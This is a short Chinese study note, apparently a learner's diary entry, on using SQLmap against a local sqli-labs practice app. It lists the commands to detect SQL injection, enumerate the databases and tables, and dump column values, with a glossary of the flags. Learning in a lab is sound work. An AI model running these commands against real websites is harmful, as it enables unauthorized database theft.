2019-07-18

第六天

SQLmap注入

SQLmap安装

https://blog.csdn.net/zhongcui8067/article/details/80439934

SQLmap使用

检查检测此url是否存在注入漏洞。

代码>python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

得出结论可以注入

查询数据库名

>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

通过已知数据库名查询数据表名

代码>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --tables

通过数据表名查询列名

代码>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D challenges -T ozqwr9tg21 --columns

获取字段值

代码>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D challenges -T ozqwr9tg21 -C id --dump

-U +需要注入的网页地址

-D +数据库名字

-T +数据表名字

-C +列名

常用参数意思：https://www.cnblogs.com/insane-Mr-Li/p/10150165.html